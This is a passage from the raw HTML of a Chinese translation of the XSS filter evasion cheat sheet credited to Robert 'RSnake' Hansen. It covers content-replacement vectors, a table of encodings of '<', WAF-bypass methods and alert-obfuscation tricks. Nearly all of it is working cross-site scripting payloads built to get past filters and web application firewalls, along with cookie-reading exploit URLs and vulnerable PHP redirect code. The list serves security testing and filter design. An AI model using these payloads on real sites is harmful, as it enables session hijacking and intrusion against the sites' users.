margin-bottom:0px; line-height:26px; word-wrap:break-word; word-break:break-word"> <A HREF="javascript:document.location='http://www.google.com/'">XSS</A></p> </blockquote> <h3 style="font-family:微软雅黑; line-height:1.1; color:rgb(0,112,192); margin:20px 0px 15px; font-size:16px"> </h3> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <div class="simditor-table" style="color:rgb(88,88,88); font-family:微软雅黑; font-size:15px"> <div class="simditor-resize-handle" style=""></div> </div> <h3 style="font-family:微软雅黑; line-height:1.1; color:rgb(0,112,192); margin:20px 0px 15px; font-size:16px"> </h3> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <h3 style="font-family:微软雅黑; line-height:1.1; color:rgb(0,112,192); margin:20px 0px 15px; font-size:16px"> <span style="">2.84.14.      内容替换作为攻击向量</span></h3> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> 假设"http://www.google.com/"会自动替换为空。我实际使用过类似的攻击向量即通过使用转换过滤器本身(示例如下)来帮助构建攻击向量以对抗现实世界的XSS过滤器:</p> <blockquote style="padding:10px 20px; margin:0px 0px 20px; font-size:15px; border-left:5px solid rgb(238,238,238); background:rgb(247,247,247); color:rgb(88,88,88); font-family:微软雅黑"> <p style="margin-top:0px; margin-bottom:0px; line-height:26px; word-wrap:break-word; word-break:break-word"> <A HREF="http://www.google.com/ogle.com/">XSS</A></p> </blockquote> <h3 style="font-family:微软雅黑; line-height:1.1; color:rgb(0,112,192); margin:20px 0px 15px; font-size:16px"> 2.85.    字符转义表<br style=""> </h3> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> 下面是HTML和JavaScript中字符“<”的所有可能组合。其中大部分不会被渲染出来,但其中许多可以在某些情况下呈现出来。:</p> <blockquote style="padding:10px 20px; margin:0px 0px 20px; font-size:15px; border-left:5px solid rgb(238,238,238); background:rgb(247,247,247); color:rgb(88,88,88); font-family:微软雅黑"> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word; text-align:justify"> <</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word; text-align:justify"> %3C</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word; text-align:justify"> &lt</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word; text-align:justify"> &lt;</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word; text-align:justify"> &LT</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word; text-align:justify"> &LT;</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word; text-align:justify"> &#60</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word; text-align:justify"> &#060</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word; text-align:justify"> &#0060</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word; text-align:justify"> &#00060</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word; text-align:justify"> &#000060</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word; text-align:justify"> &#0000060</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word; text-align:justify"> &#60;</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word; text-align:justify"> &#060;</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word; text-align:justify"> &#0060;</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word; text-align:justify"> &#00060;</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word; text-align:justify"> &#000060;</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word; text-align:justify"> &#0000060;</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word; text-align:justify"> &#x3c</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word; text-align:justify"> &#x03c</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word; text-align:justify"> &#x003c</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word; text-align:justify"> &#x0003c</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word; text-align:justify"> &#x00003c</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word; text-align:justify"> &#x000003c</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word; text-align:justify"> &#x3c;</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word; text-align:justify"> &#x03c;</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word; text-align:justify"> &#x003c;</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word; text-align:justify"> &#x0003c;</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word; text-align:justify"> &#x00003c;</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word; text-align:justify"> &#x000003c;</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word; text-align:justify"> &#X3c</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word; text-align:justify"> &#X03c</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word; text-align:justify"> &#X003c</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word; text-align:justify"> &#X0003c</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word; text-align:justify"> &#X00003c</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word; text-align:justify"> &#X000003c</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word; text-align:justify"> &#X3c;</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word; text-align:justify"> &#X03c;</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word; text-align:justify"> &#X003c;</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word; text-align:justify"> &#X0003c;</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word; text-align:justify"> &#X00003c;</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word; text-align:justify"> &#X000003c;</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word; text-align:justify"> &#x3C</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word; text-align:justify"> &#x03C</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word; text-align:justify"> &#x003C</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word; text-align:justify"> &#x0003C</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word; text-align:justify"> &#x00003C</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word; text-align:justify"> &#x000003C</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word; text-align:justify"> &#x3C;</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word; text-align:justify"> &#x03C;</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word; text-align:justify"> &#x003C;</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word; text-align:justify"> &#x0003C;</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word; text-align:justify"> &#x00003C;</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word; text-align:justify"> &#x000003C;</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word; text-align:justify"> &#X3C</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word; text-align:justify"> &#X03C</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word; text-align:justify"> &#X003C</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word; text-align:justify"> &#X0003C</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word; text-align:justify"> &#X00003C</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word; text-align:justify"> &#X000003C</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word; text-align:justify"> &#X3C;</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word; text-align:justify"> &#X03C;</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word; text-align:justify"> &#X003C;</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word; text-align:justify"> &#X0003C;</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word; text-align:justify"> &#X00003C;</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word; text-align:justify"> &#X000003C;</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word; text-align:justify"> \x3c</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word; text-align:justify"> \x3C</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word; text-align:justify"> \u003c</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word; text-align:justify"> \u003C</p> <p style="margin-top:0px; margin-bottom:0px; line-height:26px; word-wrap:break-word; word-break:break-word"> </p> </blockquote> <h2 style="font-family:微软雅黑; line-height:1.1; color:rgb(55,56,56); margin:30px 0px 15px; font-size:18px"> 3.绕过WAF的方法</h2> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> 通用问题</p> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> • 存储型XSS</p> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> 如果攻击者已经让XSS绕过过滤器,WAF无法阻止攻击透过。</p> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> •基于JavaScript的反射型XSS</p> <blockquote style="padding:10px 20px; margin:0px 0px 20px; font-size:15px; border-left:5px solid rgb(238,238,238); background:rgb(247,247,247); color:rgb(88,88,88); font-family:微软雅黑"> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word; text-align:justify"> 示例: <script> ... setTimeout(\"writetitle()\",$_GET[xss]) ... </script></p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word; text-align:justify"> 利用: /?xss=500); alert(document.cookie);//</p> <p style="margin-top:0px; margin-bottom:0px; line-height:26px; word-wrap:break-word; word-break:break-word"> </p> </blockquote> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <div class="simditor-table" style="color:rgb(88,88,88); font-family:微软雅黑; font-size:15px"> <div class="simditor-resize-handle" style=""></div> </div> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> •基于DOM的XSS</p> <blockquote style="padding:10px 20px; margin:0px 0px 20px; font-size:15px; border-left:5px solid rgb(238,238,238); background:rgb(247,247,247); color:rgb(88,88,88); font-family:微软雅黑"> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word; text-align:justify"> 示例: <script> ... eval($_GET[xss]); ... </script></p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word; text-align:justify"> 利用: /?xss=document.cookie</p> <p style="margin-top:0px; margin-bottom:0px; line-height:26px; word-wrap:break-word; word-break:break-word"> </p> </blockquote> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <div class="simditor-table" style="color:rgb(88,88,88); font-family:微软雅黑; font-size:15px"> <div class="simditor-resize-handle" style=""></div> </div> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <h3 style="font-family:微软雅黑; line-height:1.1; color:rgb(0,112,192); margin:20px 0px 15px; font-size:16px"> <span style="">通过请求重定向构造XSS</span></h3> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> •存在漏洞代码:</p> <blockquote style="padding:10px 20px; margin:0px 0px 20px; font-size:15px; border-left:5px solid rgb(238,238,238); background:rgb(247,247,247); color:rgb(88,88,88); font-family:微软雅黑"> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word; text-align:justify"> ...</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word; text-align:justify">  header('Location: '.$_GET['param']);</p> <p style="margin-top:0px; margin-bottom:0px; line-height:26px; word-wrap:break-word; word-break:break-word; text-align:justify"> ...</p> </blockquote> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <div class="simditor-table" style="color:rgb(88,88,88); font-family:微软雅黑; font-size:15px"> <div class="simditor-resize-handle" style=""></div> </div> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> 同样包括:</p> <blockquote style="padding:10px 20px; margin:0px 0px 20px; font-size:15px; border-left:5px solid rgb(238,238,238); background:rgb(247,247,247); color:rgb(88,88,88); font-family:微软雅黑"> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word; text-align:justify"> ...</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word; text-align:justify">  header('Refresh: 0; URL='.$_GET['param']);</p> <p style="margin-top:0px; margin-bottom:0px; line-height:26px; word-wrap:break-word; word-break:break-word; text-align:justify"> ...</p> </blockquote> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <div class="simditor-table" style="color:rgb(88,88,88); font-family:微软雅黑; font-size:15px"> <div class="simditor-resize-handle" style=""></div> </div> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> •这种请求不会绕过WAF:</p> <blockquote style="padding:10px 20px; margin:0px 0px 20px; font-size:15px; border-left:5px solid rgb(238,238,238); background:rgb(247,247,247); color:rgb(88,88,88); font-family:微软雅黑"> <p style="margin-top:0px; margin-bottom:0px; line-height:26px; word-wrap:break-word; word-break:break-word"> /?param=javascript:alert(document.cookie)</p> </blockquote> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <div class="simditor-table" style="color:rgb(88,88,88); font-family:微软雅黑; font-size:15px"> <div class="simditor-resize-handle" style=""></div> </div> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> •这种请求可以绕过WAF并且XSS攻击可以在某些浏览器执行:</p> <blockquote style="padding:10px 20px; margin:0px 0px 20px; font-size:15px; border-left:5px solid rgb(238,238,238); background:rgb(247,247,247); color:rgb(88,88,88); font-family:微软雅黑"> <p style="margin-top:0px; margin-bottom:0px; line-height:26px; word-wrap:break-word; word-break:break-word"> /?param=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4=</p> </blockquote> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <div class="simditor-table" style="color:rgb(88,88,88); font-family:微软雅黑; font-size:15px"> <div class="simditor-resize-handle" style=""></div> </div> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> <span style="font-weight:700">绕过</span>WAF可用<span style="font-weight:700">字符串.</span></p> <blockquote style="padding:10px 20px; margin:0px 0px 20px; font-size:15px; border-left:5px solid rgb(238,238,238); background:rgb(247,247,247); color:rgb(88,88,88); font-family:微软雅黑"> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word; text-align:justify"> <Img src = x onerror = "javascript: window.onerror = alert; throw XSS"></p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word; text-align:justify"> <Video> <source onerror = "javascript: alert (XSS)"></p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word; text-align:justify"> <Input value = "XSS" type = text></p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word; text-align:justify"> <applet code="javascript:confirm(document.cookie);"></p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word; text-align:justify"> <isindex x="javascript:" οnmοuseοver="alert(XSS)"></p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word; text-align:justify"> "></SCRIPT>”>’><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT></p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word; text-align:justify"> "><img src="x:x" οnerrοr="alert(XSS)"></p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word; text-align:justify"> "><iframe src="javascript:alert(XSS)"></p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word; text-align:justify"> <object data="javascript:alert(XSS)"></p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word; text-align:justify"> <isindex type=image src=1 οnerrοr=alert(XSS)></p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word; text-align:justify"> <img src=x:alert(alt) οnerrοr=eval(src) alt=0></p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word; text-align:justify"> <img  src="x:gif" οnerrοr="window['al\u0065rt'](0)"></img></p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word; text-align:justify"> <iframe/src="data:text/html,<svg οnlοad=alert(1)>"></p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word; text-align:justify"> <meta content="&NewLine; 1 &NewLine;; JAVASCRIPT&colon; alert(1)" http-equiv="refresh"/></p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word; text-align:justify"> <svg><script xlink:href=data&colon;,window.open('https://www.google.com/')></script</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word; text-align:justify"> <meta http-equiv="refresh" content="0;url=javascript:confirm(1)"></p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word; text-align:justify"> <iframe src=javascript&colon;alert&lpar;document&period;location&rpar;></p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word; text-align:justify"> <form><a href="javascript:\u0061lert(1)">X</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word; text-align:justify"> </script><img/*%00/src="worksinchrome&colon;prompt(1)"/%00*/οnerrοr='eval(src)'></p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word; text-align:justify"> <style>//*{x:expression(alert(/xss/))}//<style></style> </p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word; text-align:justify"> On Mouse Over​</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word; text-align:justify"> <img src="/" =_=" title="οnerrοr='prompt(1)'"></p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word; text-align:justify"> <a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script:&#97lert(1)>ClickMe</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word; text-align:justify"> <script x> alert(1) </script 1=2</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word; text-align:justify"> <form><button formaction=javascript&colon;alert(1)>CLICKME</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word; text-align:justify"> <input/οnmοuseοver="javaSCRIPT&colon;confirm&lpar;1&rpar;"</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word; text-align:justify"> <iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe></p> <p style="margin-top:0px; margin-bottom:0px; line-height:26px; word-wrap:break-word; word-break:break-word"> <span style="font-weight:700"><br style=""> </span></p> </blockquote> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <div class="simditor-table" style="color:rgb(88,88,88); font-family:微软雅黑; font-size:15px"> <div class="simditor-resize-handle" style=""></div> </div> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <h3 style="font-family:微软雅黑; line-height:1.1; color:rgb(0,112,192); margin:20px 0px 15px; font-size:16px"> 3.1.  Alert混淆以绕过过滤器</h3> <blockquote style="padding:10px 20px; margin:0px 0px 20px; font-size:15px; border-left:5px solid rgb(238,238,238); background:rgb(247,247,247); color:rgb(88,88,88); font-family:微软雅黑"> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word; text-align:justify"> (alert)(1)</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word; text-align:justify"> a=alert,a(1)</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word; text-align:justify"> [1].find(alert)</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word; text-align:justify"> top[“al”+”ert”](1)</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word; text-align:justify"> top[/al/.source+/ert/.source](1)</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word; text-align:justify"> al\u0065rt(1)</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word; text-align:justify"> top[‘al\145rt’](1)</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word; text-align:justify"> top[‘al\x65rt’](1)</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word; text-align:justify"> top[8680439..toString(30)](1)</p> <p style="margin-top:0px; margin-bottom:0px; line-height:26px; word-wrap:break-word; word-break:break-word"> </p> </blockquote> <h2 style="font-family:微软雅黑; line-height:1.1; color:rgb(55,56,56); margin:30px 0px 15px; font-size:18px"> 4.作者和主要编辑</h2> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> Robert "RSnake" Hansen</p> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> </p> <h2 style="font-family:微软雅黑; line-height:1.1; color:rgb(55,56,56); margin:30px 0px 15px; font-size:18px"> 5.贡献者</h2> <p style="margin-top:0px; 